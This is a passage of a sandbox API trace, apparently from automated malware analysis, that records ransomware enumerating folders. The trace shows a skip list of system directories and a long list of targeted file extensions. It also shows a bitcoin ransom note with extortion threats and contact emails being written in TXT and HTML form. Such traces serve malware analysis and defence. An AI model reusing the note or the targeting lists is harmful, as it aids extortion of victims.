	[0170.079] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee55a9c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ee55a9c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ee55a9c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.079] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ee2f8d7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ee2f8d7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ee2f8d7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.080] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="INT", cAlternateFileName="")) returned 1
	[0170.080] lstrcmpW (lpString1="INT", lpString2="..") returned 1
	[0170.080] lstrcmpW (lpString1="INT", lpString2=".") returned 1
	[0170.080] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL"
	[0170.080] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\"
	[0170.080] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="INT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT"
	[0170.080] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT"
	[0170.080] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\"
	[0170.081] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\"
	[0170.081] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*"
	[0170.081] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.081] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*") returned 48
	[0170.081] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.082] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*", cchLength=0x30 | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*") returned 0x30
	[0170.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="windows") returned 0x0
	[0170.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.082] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="boot") returned 0x0
	[0170.082] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="system volume information") returned 0x0
	[0170.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="temp") returned 0x0
	[0170.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="program files") returned 0x0
	[0170.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="appdata") returned 0x0
	[0170.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="application data") returned 0x0
	[0170.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="winnt") returned 0x0
	[0170.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="tmp") returned 0x0
	[0170.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="cache") returned 0x0
	[0170.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.086] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.086] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="webcache") returned 0x0
	[0170.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.086] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="inetcache") returned 0x0
	[0170.086] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.087] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="nvidia") returned 0x0
	[0170.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.087] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="packages") returned 0x0
	[0170.087] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.114] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="cookies") returned 0x0
	[0170.115] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.115] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="programdata") returned 0x0
	[0170.115] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.115] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1
	[0170.115] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2="..") returned 1
	[0170.115] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2=".") returned 1
	[0170.116] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\"
	[0170.116] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\", lpString2="ppcrlconfig600.dll" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll"
	[0170.116] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll") returned 63
	[0170.116] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.116] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\ppcrlconfig600.dll", cchLength=0x3f | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll") returned 0x3f
	[0170.116] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.116] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll", lpSrch="help_decrypt_your_files") returned 0x0
	[0170.117] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll" | out: lpString1="c:\\users\\all users\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll") returned="c:\\users\\all users\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll"
	[0170.117] lstrlenW (lpString="c:\\users\\all users\\microsoft\\identitycrl\\int\\ppcrlconfig600.dll") returned 63
	[0170.117] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.117] StrStrW (lpFirst=".dll", lpSrch=".") returned=".dll"
	[0170.117] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.118] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".dll") returned 0x0
	[0170.118] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 0
	[0170.118] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.120] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.121] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT"
	[0170.121] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*"
	[0170.121] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.121] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.121] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\HELP_DECRYPT_YOUR_FILES.TXT") returned 72
	[0170.121] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.122] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0170.123] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.126] CloseHandle (hObject=0x388) returned 1
	[0170.127] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.127] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.128] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0170.130] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.130] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.130] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.130] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.131] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0170.131] CloseHandle (hObject=0x388) returned 1
	[0170.131] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.132] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.132] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.132] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\HELP_DECRYPT_YOUR_FILES.HTML") returned 73
	[0170.132] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.141] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a 